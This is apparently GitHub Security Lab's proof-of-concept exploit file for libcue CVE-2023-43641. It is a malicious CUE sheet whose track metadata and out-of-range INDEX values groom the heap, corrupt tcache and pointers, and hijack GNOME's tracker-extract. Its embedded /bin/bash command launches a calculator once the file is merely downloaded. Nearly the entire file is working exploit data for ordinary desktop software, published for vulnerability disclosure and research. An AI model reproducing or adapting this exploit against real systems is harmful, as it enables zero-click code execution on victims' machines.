-
Notifications
You must be signed in to change notification settings - Fork 252
/
Copy pathlunar.cue
44698 lines (377 loc) · 64 KB
/
lunar.cue
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
PERFORMER Kev
TITLE "Kev'z Warez"
FILE pwned.mp3 MP3
TRACK 000 AUDIO
MESSAGE "First some [heap feng shui](https://en.wikipedia.org/wiki/Heap_feng_shui):
allocate memory so that all subsequent allocations come from a continguous block of
memory. For example, this string is 251 characters long to use a chunk from tcache
index 15."
TRACK 001 AUDIO
TITLE "A Track is 0x3a8 bytes, so creating many new tracks is a quick way to use lots of memory."
TRACK 002 AUDIO
TITLE "Again "
TRACK 003 AUDIO
TITLE "Again "
TRACK 004 AUDIO
TITLE "Again "
TRACK 005 AUDIO
TITLE "Again "
TRACK 006 AUDIO
TITLE "Again "
TRACK 007 AUDIO
TITLE "Again "
TRACK 008 AUDIO
TITLE "Again "
TRACK 009 AUDIO
TITLE "Again "
TRACK 010 AUDIO
TITLE "Again "
TRACK 011 AUDIO
TITLE "Again "
TRACK 012 AUDIO
TITLE "Again "
TRACK 013 AUDIO
TITLE "Again "
TRACK 014 AUDIO
TITLE "Again "
TRACK 015 AUDIO
TITLE "Again "
TRACK 016 AUDIO
TITLE "Again "
TRACK 017 AUDIO
TITLE "Again "
TRACK 018 AUDIO
TITLE "Again "
TRACK 019 AUDIO
TITLE "Again "
TRACK 020 AUDIO
TITLE "Again "
TRACK 021 AUDIO
TITLE "Again "
TRACK 022 AUDIO
TITLE "Again "
TRACK 023 AUDIO
TITLE "Again "
TRACK 024 AUDIO
TITLE "Again "
TRACK 025 AUDIO
TITLE "Again "
TRACK 026 AUDIO
TITLE "Again "
TRACK 027 AUDIO
TITLE "Again "
TRACK 028 AUDIO
TITLE "Again "
TRACK 029 AUDIO
TITLE "Again "
TRACK 030 AUDIO
TITLE "Again "
TRACK 031 AUDIO
TITLE "Again "
TRACK 032 AUDIO
TITLE "Again "
TRACK 033 AUDIO
TITLE "Heap Feng Shui: empty the tcache"
COMPOSER "Allocate a chunk from tcache index 2 "
ARRANGER "Allocate a chunk from tcache index 4 "
PERFORMER "Allocate a chunk from tcache index 6
"
SONGWRITER "Allocate a chunk from tcache index 7
"
GENRE "Allocate a chunk from tcache index 11
"
MESSAGE "The goal here is to ensure that all subsequent allocations come
from a large contiguous block of memory. This string allocates a chunk from
tcache index 13. Doing this 14 times guarantees that the tcache is empty. "
TRACK 034 AUDIO
TITLE "Copyright (c) 2023 GitHub, Inc."
COMPOSER "[GitHub Security Lab](https://securitylab.github.com/)"
ARRANGER "
This version of the poc is tuned for Ubuntu 23.04 (Lunar Lobster)
"
PERFORMER "[Kevin Backhouse](https://github.com/kevinbackhouse)
"
SONGWRITER "
"
GENRE "[The Malloc Maleficarum](https://seclists.org/bugtraq/2005/Oct/118).
See also: [how2heap](https://github.com/shellphish/how2heap).
"
MESSAGE "Proof-of-concept exploit for libcue CVE-2023-43641 (GHSL-2023-197): out of bounds
array access in track_set_index. The vulnerability is used to get code execution in GNOME's
tracker-extract. Download this file to pop a calc."
TRACK 035 AUDIO
TITLE "Never Gonna Give You Up "
COMPOSER "Rick Astley "
ARRANGER " "
PERFORMER "
We're no strangers to love
You know the rules and so do I
"
SONGWRITER "
A full commitment's what I'm thinking of
You wouldn't get this from any other guy
"
GENRE "
I just want to tell you how I'm feeling
Gotta make you understand
"
MESSAGE "
Never gonna give you up, never gonna let you down
Never gonna run around and desert you
Never gonna make you cry, never gonna say goodbye
Never gonna tell a lie and hurt you
"
TRACK 036 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 037 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 038 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 039 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 040 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 041 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 042 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 043 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 044 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 045 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 046 AUDIO
TITLE "Repeat Heap Feng Shui "
COMPOSER " "
ARRANGER " "
PERFORMER "
"
SONGWRITER "
"
GENRE "
"
MESSAGE "
"
TRACK 047 AUDIO
TITLE "for freeing to tcache index 1"
TITLE "free previous title"
INDEX 4294964432 4294958312
TRACK 048 AUDIO
TITLE "Allocate previously freed string"
INDEX 4294967268 149
INDEX 4294964250 4294958324
TITLE "long string to overwrite low bytes of address ð
"
INDEX 4294955254 69
FILE pwned.mp3 MP3
GENRE "set low bytes of info->file P"
TITLE "long string to overwrite low bytes of address 0"
INDEX 4294955262 53
FILE pwned.mp3 MP3
PERFORMER "set low bytes of file->g_class Ð"
INDEX 4294955259 0
TITLE "long string to overwrite low bytes of address "
INDEX 4294955322 85
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address ° "
INDEX 4294955150 69
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address "
INDEX 4294955292 277
FILE pwned.mp3 MP3
MESSAGE "set low bytes of tcache->entries[15] `"
MESSAGE "kevwozere"
TITLE "long string to overwrite low bytes of address Ð"
INDEX 4294955282 85
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address à"
INDEX 4294955284 949
FILE pwned.mp3 MP3
TITLE "long string to overwrite low bytes of address 0"
INDEX 4294955294 949
FILE pwned.mp3 MP3
TITLE "long title to allocate 0x110-sized chunk. "
TRACK 049 AUDIO
INDEX 4294967243 0
INDEX 4294967247 1
INDEX 4294967254 0
INDEX 4294967255 0
TRACK 050 AUDIO
TITLE "Overwrite low bytes of track->file.name `"
INDEX 4294967294 277
FILE "wen poc?" MP3
TITLE "Overwrite low bytes of track->file.name à"
INDEX 14 949
FILE pwned.mp3 MP3
TITLE "Overwrite low bytes of track->file.name 0"
INDEX 24 949
FILE pwned.mp3 MP3
TITLE "Overwrite low bytes of track->file.name °"
INDEX 4294967272 53
FILE pwned.mp3 MP3
INDEX 0 4294967295
INDEX 1 0
INDEX 1 1892336
INDEX 14 0
TRACK 051 AUDIO
FLAGS
TRACK 052 AUDIO
ISRC looooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooog-string-to-allocate-0x110-sized-chunk
TITLE "long title to overwrite low bytes of track->isrc `"
INDEX 4294967294 277
ISRC short-string
INDEX 0 4294967295
INDEX 1 0
INDEX 1 242320
INDEX 4294967088 0
INDEX 4294967090 0
INDEX 4294967271 100
INDEX 4294967273 0
INDEX 4294967280 80
TRACK 053 AUDIO
INDEX 4294963806 4294958357
TRACK 054 AUDIO
INDEX 4294967279 0
INDEX 4294963634 4294958317
TRACK 055 AUDIO
INDEX 4294967282 0
INDEX 4294963462 3817
TITLE "Temporary long title for tcache index 6 "
TITLE "short title"
TRACK 056 AUDIO
TITLE "Use long title from tcache index 6 "
INDEX 4294967258 197
TITLE " /bin/bash"
INDEX 4294963270 3818
TRACK 057 AUDIO
INDEX 4294967279 25389
INDEX 4294963098 3819
TITLE "Temporary long title for tcache index 6 "
TITLE "eta son"
TRACK 058 AUDIO
TITLE "Use long title from tcache index 6 "
INDEX 4294967258 357
TITLE "This command is going to get called repeatedly in an infinite loop, so send SIGSTOP to avoid a fork-bomb and use flock so only one calculator starts. killall -SIGSTOP tracker-extract-3; flock -w 3 ~/Downloads/pwned.lock -c 'gnome-calculator -e 1337' && (sleep 10; rm ~/Downloads/pwned.lock; killall -9 tracker-extract-3)"
INDEX 4294962906 4294958329
PERFORMER "Temporary long name for tcache index 6 "
PERFORMER "short name"
TRACK 059 AUDIO
INDEX 4294962714 4566
TITLE "Use chunk from tcache index 6 "
INDEX 4294967258 197
TITLE "short title"
TRACK 060 AUDIO
INDEX 4294962538 4565
TITLE " Ð"
TRACK 1337 AUDIO
INDEX 4294967290 0
TITLE "Use the chunk that is still in tcache index 2"
MESSAGE "pop that calc "
REM DATE "1992 AD"